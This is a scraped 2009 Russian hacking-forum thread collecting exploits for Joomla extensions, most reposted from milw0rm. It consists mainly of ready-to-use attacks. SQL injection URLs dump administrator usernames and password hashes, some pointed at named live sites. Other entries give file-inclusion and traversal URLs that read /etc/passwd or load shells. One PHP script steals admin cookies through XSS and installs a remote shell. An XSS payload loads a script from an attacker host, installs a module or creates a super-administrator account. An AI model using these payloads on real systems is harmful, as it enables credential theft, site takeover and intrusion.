Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Joomla Component com_bookjoomlas |
07.04.2009, 10:17
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Joomla Component com_bookjoomlas
Код:
[+] Bugs
- [A] SQL Injection
[-] Security risk: low
[-] File affected: sub_commententry.php
This bug allows a privileged user to view username
and password of a registered user. Like all SELECT
vulnerable queries, this can be manipulate to write
files on system.
*************************************************
[+] Code
- [A] SQL Injection
http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
*************************************************
[+] Fix
No fix.
*************************************************
# milw0rm.com [2009-04-06]
|
|
|
13.04.2009, 15:33
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Код:
#############################################################################
# #
# Joomla Component MailTo SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MailTo (com_mailto)"
[~] Date: "April 2006"
########################################
[~] Exploit /index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
[~] Example /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] LiveDemo: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
Код:
#############################################################################
# #
# Joomla Component MaianMusic SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MaianMusic (com_maianmusic)"
[~] Version: "1.2.1"
[~] Date: "09-26-2008"
[~] Author: "Arelowo Alao & David Bennett"
[~] Author E-mail: "Alao@aretimes.com"
[~] Author URL: "www.aretimes.com"
########################################
[~] Exploit: /index.php?option=com_maianmusic§ion=category&category=[SQL]&Itemid=70
[~] Example: /index.php?option=com_maianmusic§ion=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70
########################################
[~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic§ion=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
Код:
#############################################################################
# #
# Joomla Component Cmimarketplace Directory Traversal Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "Cmimarketplace (com_cmimarketplace)"
[~] Date: "August 2008"
[~] Author: "Magnetic Merchandising Inc."
[~] E-mail: "client@ijobid.com"
[~] Author URL: "www.ijobid.com"
########################################
[~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1
[~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
© milw0rm.com [2009-04-08] |
|
|
|
16.04.2009, 19:33
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Cегодня пришлось дело иметь дело с Джумлой 1.5, начал искать сплоенты, нашел на оффе http://forum.joomla.org/viewtopic.php?f=300&t=371705
Вот написал небольшой експлоит:
Код:
<?php
// Удаление произвольных изображений в каталоге Joomla
// by [underwater]
$WEB_VULNERABLE = 'http://www.site.com/';
if(!$archive = obt_archive($WEB_VULNERABLE.'images/')){
echo '<iframe src="'.$WEB_VULNERABLE.'administrator/index.php?option=com_media&task=file.delete&tmpl=component&folder=&rm[]=index.html" width="1" height="1" frameborder="0"></iframe>';
ob_get_contents();
sleep(5);
}
if($archive= obt_archive($WEB_VULNERABLE.'images/')){
foreach($archivos as $valor){
if(eregi('/', $valor[(count($valor)-1)])){ $tipo = 'folder'; }else{ $tipo = 'file'; }
echo '<iframe src="'.
$WEB_VULNERABLE.'administrator/index.php?option=com_media&task='.$tipo
.'.delete&tmpl=component&folder=&rm[]='.urlencode($valor)
.'" width="1" height="1" frameborder="0"></iframe>';
}
}
function obt_archive($url){
$buffer = explode(']"> <a href="', file_get_contents($url));
foreach($buffer as $item=> $valor){
if($item != '0'){
$temp = explode('"', $valor);
$retorn[count($retorno)] = $temp[0];
}
}
return $retorn;
}
?>
Потом нашел ксс
Код:
http://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%2520%2578%253d%2578%253e%2561%256c%2565%2572%2574%2528%2530%2530%2530%2530%2530%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search
Не знаю была ли найдена ксс до меня или нет, я нигде не встречал, самое вкусное что через нее можно залить шелл, вот сплоит:
Код:
<?php
error_reporting(0);
$EXPL['SITE_VULNERABLE'] = 'http://127.0.0.1/joomla/';
$EXPL['URL_COM_SHELL'] = 'http://127.0.01/shell'; // Путь к шеллу
$EXPL['XSS'] = '<script '.
'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';
if($_GET['act'] == 'js'){
die('
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function base64_encode(input){
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
do{
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if(isNaN(chr2)){
enc3 = enc4 = 64;
}else if(isNaN(chr3)){
enc4 = 64;
}
output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
}while(i < input.length);
return output;
}
window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
');
}elseif($_GET['act'] == 'gall'){
if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>Нет печенья(</strong>');
$buffer = http_get($EXPL['SITE_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
$buscar = expl('hidden" name="', $buffer);
foreach($buscar as $encont){
$encont = expl('"', $encont);
$encont = $encont[0];
if(strlen($encont) == 32){
$hash = $encont;
break;
}
}
$buffer = http_post(
$EXPL['SITE_VULNERABLE'].'/administrator/index.php', $cookies,
$hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
);
if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
/ / Операция выполнена успешно! шелл /modules/mod_artimesk/mod_artimesk.php
header('UnderWhat?!');
$explot = true;
}else{
$explot = false;
}
if($archiv_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
if($explot){
fwrite($archiv_handle, 'Шелл успешно загружен'. URL: '.$EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
header('location: https://forum.antichat.ru');
}else{
fwrite($archiv_handle,
.$EXPL['SITIO_VULNERABLE'].' Експлоит не может быть использован, так как не совместима версия, или у вас нету админ прав.'."\x0D\x0A");
}
fclose($archiv_handle);
}
exit($explot);
}
// Выполнение произвольного кода яваскрипт
$pedir = $EXPL['SITЕ_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir, 'null[]=token')){
header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
die('hola :-s');
}
function http_post($url, $cookies, $postdata){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}
function http_get($url, $cookies){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}
?>
Последний раз редактировалось [underwater]; 16.04.2009 в 19:35..
|
|
|
|
Joomla Component rsmonials Remote Cross Site Scxripting Exploit |
22.04.2009, 23:44
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
Joomla Component rsmonials Remote Cross Site Scxripting Exploit
Код:
/*
RSMonials XSS Exploit
http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component
Google Dork: allinurl:option=com_rsmonials
Anything entered into the form gets rendered as HTML, so you can add tags
as long as they don't include quotes (magic quotes eats them, if it's on).
This component ships with settings that prevent posting by default, but
the administrator page for the testimonials renders your script in its entirety.
Proof of Concept 1: Remote file upload
Visit http://target.com/index.php?option=com_rsmonials and post a comment.
At the end of your glowing comment about how awesome the site is, attach this:
<script src=http://badsite.com/evil.js></script>
Now, when your admin goes to the com_rsmonials "Testimonials" page, your
script will execute. In this example, a hidden iframe loads up the install
page and installs a 'custom' module.
*/
var exploited = false;
var iframe = document.createElement( 'iframe' );
var reg = new RegExp( 'administrator' );
if( reg.test( location.href ) )
{
iframe.src = 'index.php?option=com_installer';
iframe.setStyle( 'display', 'none' );
document.body.appendChild( iframe );
iframe.addEvent( 'load', exploit );
}
function exploit( e )
{
if( exploited != true )
{
var doc = e.target.contentDocument; if( !doc ) return;
var inp = doc.getElementById( 'install_url' );
inp.value = 'http://badsite.com/exploit.zip';
var b = inp.parentNode.getElementsByTagName( 'input' )[1];
b.onclick();
exploited = true;
}
}
/*
Proof of Concept 2: New Super Administrator
Here's a drop-in replacement for the 'exploit' function above:
function exploit( e )
{
if( exploited != true )
{
var newForm = false;
var doc = e.target.contentDocument; if( !doc ) return;
var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return;
var i = 0;
for( ; i<nb.length; i++ )
{
if( nb[i].parentNode.id == 'toolbar-new' )
{
nb[i].onclick();
}
else if( nb[i].parentNode.id == 'toolbar-save' )
{
doc.getElementById( 'name' ).value = 'hacked';
doc.getElementById( 'username' ).value = 'hacked';
doc.getElementById( 'email' ).value = 'your@freemail.com';
doc.getElementById( 'password' ).value = 'password';
doc.getElementById( 'password2' ).value = 'password';
var g = doc.getElementById( 'gid' );
g.selectedIndex = g.options.length - 1;
nb[i].onclick();
exploited = true;
}
}
}
}
If the admin is a Super Admin, then you could be too... just remember to watch
your freemail account for Joomla's account notification!
*/
/* jdc 2009 */
# milw0rm.com [2009-04-22]
|
|
|
|
24.04.2009, 04:46
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
com_dictionary
/components/com_dictionary/dictionary.php
PHP код:
if($wordid)//выбрано слово, надо показать описание
{
echo "<h3>Описание</h3>";
$database->setQuery("SELECT wordid,word,worddescription FROM #__dictionary where wordid=".$wordid);
$result = $database->query();
$row = mysql_fetch_object($result);
index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users
|
|
|
|
27.04.2009, 23:52
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Прочитал в каком-то испанском блоге про следующую уязвимость:
http://127.0.0.1/joomla/index.php?option=com_user&task=register
В имени пользователя можно вставить HTML-код, есть небольшой фильтр, который обходится кавычками ;P
Например, что-то типа:
Код:
number" onclick="document.location='http://www.site.com/?cookies.php?cookies='+document.cookie" x="
Дальше дело техники - однопиксельная пикча делает перенаправление на евил скрипт.
Находится данное чудо тут: /administrator/components/com_users/views/user/tmpl/form.php
Прикольно то что джумло-кодеры проепали точто также еще 10 файлов) |
|
|
|
28.04.2009, 18:04
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Clickheat [fr Joomla]
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
Vuln file: install.clickheat.php
Viln Code:
Код:
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00
Vuln file: _main.php
Viln Code:
Код:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: main.php
Viln Code:
Код:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: Cache.php
Viln Code:
Код:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: Clickheat_Heatmap.php
Viln Code:
Код:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: GlobalVariables.php
Viln Code:
Код:
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
Exploit:
Код:
http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Нда вобщем-то...)
|
|
|
|
18.05.2009, 17:38
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities
ArtForms 2.1b7 remote file includes
From Turkey
iskorpitx (O bir dünya markası Asla Taklit Edilemez)
// swfmovie.php - swf output and config
/* output captcha image */
/* output captcha mp3 */
----------------------------------------------------------------------------------
Код:
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell
Код:
[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell
Код:
[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx
admin@mavi1.org
# milw0rm.com [2009-05-15]
Последний раз редактировалось swt1; 18.05.2009 в 17:44..
|
|
|
|
02.06.2009, 12:25
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection
================================================== ================================
Joomla Component com_juser (id) SQL injection Vulnerability
================================================== ================================
################################################## #
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine 
[+] Email : chipdebios[alt+64]gmail.com
################################################## #
Код:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
Код:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
Код:
http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>
# milw0rm.com [2009-06-01]
|
|
|
|
15.06.2009, 11:33
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
Joomla Component com_vehiclemanager 1.0 RFI Vulnerability
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Joomla com_vehiclemanager 1.0 Remote File Include
Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Found: xoron
contact: xorontr@gmail.com (only e-mail)
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Exploit:
-> ...
Код:
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Thanx: str0ke, VoLkan
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
# milw0rm.com [2009-06-09]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [underwater]](/avatars/avatar81148.gif){kind=avatar}
Похожие темы
Линейный вид
